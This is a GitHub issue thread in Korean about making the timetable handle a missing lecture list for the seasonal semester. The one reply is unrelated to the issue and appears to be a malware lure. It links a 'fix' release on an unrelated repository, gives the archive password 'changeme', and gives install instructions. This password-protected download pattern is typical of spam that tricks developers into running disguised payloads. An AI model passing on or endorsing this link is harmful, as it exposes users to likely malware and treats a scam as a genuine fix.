### ISSUE TITLE
[시간표] 강의 목록 없는 경우 로직 처리

### ISSUE THREAD

**Issue by hyejun0228** [BCSDLab/KOIN_WEB_RECODE#459]
## Describe the bug
강의 목록이 없는 경우 로직 처리 (계절학기)
- 디자인 나오면 진행

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
